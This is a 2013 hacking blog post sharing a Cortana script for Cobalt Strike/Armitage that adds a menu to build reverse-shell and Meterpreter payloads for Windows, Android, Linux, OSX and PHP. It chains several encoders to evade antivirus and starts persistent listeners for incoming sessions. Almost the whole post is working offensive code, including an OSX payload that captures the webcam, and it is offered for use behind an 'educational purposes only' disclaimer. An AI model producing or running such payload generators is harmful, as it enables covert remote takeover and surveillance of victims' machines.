
Tuesday, December 10, 2013

Three Days with Cortana Script Engine - Cobalt Strike/Armitage


Beacon A new advance payload for Cobalt Strike_thumb[2]

 

Auto Payload Menu meets Cobalt Strike Script Engine

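Bored again, so I scripted a short payload menu for Cobalt Strike/Armitage. Each menu item prompts for a host, a port and a filename, writes the generated payload to /root/Desktop and starts a matching exploit/multi/handler job in a new console tab.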

Some Screenshots :

Kali-2013-12-09-19-39-36Kali-2013-12-09-19-40-14Kali-2013-12-09-19-40-01Kali-2013-12-09-19-40-35Kali-2013-12-09-19-39-51Kali-2013-12-09-19-40-28Kali-2013-12-09-19-42-06Kali-2013-12-09-19-42-16Kali-2013-12-10-01-35-29Kali-2013-12-09-19-45-05Kali-2013-12-10-01-36-02Kali-2013-12-10-01-36-12   Kali-2013-12-09-19-45-43         

Source Code :

# Multi Payload Menu Engine v0.1
# Cortana Script Engine r0ckz.
# by cr4shyyyy
# from http://security-is-just-an-illusion.blogspot.de

# Registers a top-level "Payloads" entry in the menu bar, bound to the "payloads"
# popup hook defined further down in this script.
# NOTE(review): the third argument (2) is presumably the position of the entry in
# the menu bar - confirm against the Cortana documentation.
menubar("Payloads", "payloads",2);

popup payloads {
menu "Windows Payloads" {
# Menu item: asks the operator for a callback host, port and output filename, then
# generates a Windows x86 Meterpreter reverse_tcp executable and starts a matching
# exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into an output path under /root/Desktop.
# NOTE(review): msfpayload and msfencode were removed from Metasploit in 2015 in
# favour of msfvenom, so the generator line is tied to frameworks of this post's era.
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x86 Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Meterpreter x86 Reverse Tcp Payload");
# One command line sent to the console tab: msfpayload raw output piped through
# five msfencode passes, the last one writing an exe to /root/Desktop/$filehandler.
# The encoder stubs named here are public and long-standing, and endpoint products
# commonly carry signatures for them; the dropped file and the LPORT listener are
# the artefacts to look for when this is run in a lab.
# NOTE(review): the payload is generated with EXITFUNC=thread, while the handler
# and the summary below use EXITFUNC process.
cmd($console, "msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o /root/Desktop/$filehandler");
# Configure the listener with the same host, port and payload as the generated file.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
# ExitOnSession false with "exploit -j" leaves the listener running as a background
# job after the first session, so it has to be stopped explicitly when done.
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
# Summary echoed to the script console; these are fixed strings plus the prompted
# values, not values read back from the handler.
println("----------------------------------------\n\c4Meterpreter\c4 x86 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
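# Menu item: asks the operator for a callback host, port and output filename, then
# generates a Windows x64 Meterpreter reverse_tcp file and starts a matching
# exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into an output path under /root/Desktop.
item "Reverse Meta x64" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x64 Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Meterpreter x64 Reverse Tcp Payload");
# One command line sent to the console tab; output is redirected to
# /root/Desktop/$filehandler.
cmd($console, "msfpayload windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X | msfencode -c 10 -e x86/shikata_ga_nai > /root/Desktop/$filehandler");
# Configure the listener with the same host, port and payload as the generated file.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/x64/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
# ExitOnSession false with "exploit -j" leaves the listener running as a background
# job after the first session, so it has to be stopped explicitly when done.
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
# Summary echoed to the script console. The PAYLOAD and Encoder lines now repeat
# the values actually set on the handler above; the original printed the x86
# payload name and a non-matching encoder name, which made the operator's log
# disagree with what was configured.
println("----------------------------------------\n\c4Meterpreter\c4 x64 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/x64/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}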
}
menu "Android Payloads" {
# Menu item: asks the operator for a callback host, port and output filename, then
# writes an android/meterpreter/reverse_tcp payload to /root/Desktop and starts a
# matching exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into the output path.
item "Reverse Meta Java" {
$ip = prompt_text("Enter Host for Android Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Android Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Android Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Meterpreter Android Reverse Tcp Payload");
# Generator command sent to the console tab; raw output redirected to the file.
cmd($console, "msfpayload android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > /root/Desktop/$filehandler");
# Listener configured with the same host, port and payload, started as a job.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD android/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
# Summary echoed to the script console: fixed strings plus the prompted values.
println("----------------------------------------\n\c4Meterpreter\c4 Android Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD android/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Linux Payloads" {
# Menu item: asks the operator for a callback host, port and output filename, then
# writes a linux/x86/meterpreter/reverse_tcp payload to /root/Desktop and starts a
# matching exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into the output path.
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Linux Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Meterpreter Linux Reverse Tcp Payload");
# Generator command sent to the console tab; output redirected to the file.
cmd($console, "msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
# Listener configured with the same host, port and payload, started as a job.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x86/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
# Summary echoed to the script console: fixed strings plus the prompted values.
println("----------------------------------------\n\c4Meterpreter\c4 Linux Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x86/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
# Menu item: asks the operator for a callback host, port and output filename, then
# writes a linux/x64/shell_reverse_tcp payload to /root/Desktop and starts a
# matching exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into the output path.
item "Reverse Shell x64" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Shell Linux x64 Reverse Shell Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Shell Linux Reverse Shell Payload");
# Generator command sent to the console tab; output redirected to the file.
cmd($console, "msfpayload linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
# Listener configured with the same host, port and payload, started as a job.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x64/shell_reverse_tcp");
cmd($console, "exploit -j");
# Summary echoed to the script console: fixed strings plus the prompted values.
# NOTE(review): the detail lines are labelled "Meterpreter" although the payload
# set above is a plain shell_reverse_tcp.
println("----------------------------------------\n\c4Shell\c4 Linux x64 Reverse Shell Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x64/shell_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "OSX Payloads" {
# Menu item: asks the operator for a callback host, port and output filename, then
# writes an osx/x86/isight/reverse_tcp payload to /root/Desktop and starts a
# matching exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into the output path.
item "Reverse iSight" {
$ip = prompt_text("Enter Host for OSX Reverse Tcp Payload");
$port = prompt_text("Enter Port for OSX Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 OSX iSight Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("OSX iSight Reverse Tcp Payload");
# Generator command sent to the console tab; output redirected to the file.
cmd($console, "msfpayload osx/x86/isight/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
# Listener configured with the same host, port and payload, started as a job.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD osx/x86/isight/reverse_tcp");
cmd($console, "exploit -j");
# Summary echoed to the script console: fixed strings plus the prompted values.
# NOTE(review): the detail lines are labelled "Meterpreter" although the payload
# set above is osx/x86/isight/reverse_tcp.
println("----------------------------------------\n\c4OSX iSight \c4Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD osx/x86/isight/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "PHP Payloads" {
# Menu item: asks the operator for a callback host, port and output filename, then
# writes a base64-encoded php/meterpreter_reverse_tcp payload to /root/Desktop and
# starts a matching exploit/multi/handler job in a new console tab.
# NOTE(review): only $ip is tested against $null (presumably the value returned when
# a prompt is cancelled), so a cancelled port or filename prompt still reaches the
# command strings. All three values are interpolated unvalidated into console
# command lines and into the output path.
item "Reverse Meta PHP" {
$ip = prompt_text("Enter Host for PHP Reverse Tcp Payload");
$port = prompt_text("Enter Port for PHP Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter PHP Reverse Tcp Payload Now \n----------------------------------------");
# NOTE(review): this value is overwritten on the next line before it is used;
# confirm whether console() allocates a console that is then left unused.
$console = console();
$console = open_console_tab("Meterpreter PHP Reverse Tcp Payload");
# Generator command sent to the console tab: raw payload piped through one
# php/base64 msfencode pass, written with -o to the output file.
cmd($console, "msfpayload php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R | msfencode -c 1 -e php/base64 -t raw -o /root/Desktop/$filehandler");
# Listener configured with the same host, port and payload, started as a job.
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD php/meterpreter_reverse_tcp");
# NOTE(review): AutoSystemInfo presumably makes the session gather system
# information when it opens - confirm against the payload's advanced options.
cmd($console, "set AutoSystemInfo 1");
cmd($console, "exploit -j");
# Summary echoed to the script console: fixed strings plus the prompted values.
println("----------------------------------------\n\c4Meterpreter\c4 PHP Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD php/meterpreter_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
}


[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and its author are in no way responsible for any misuse of the information.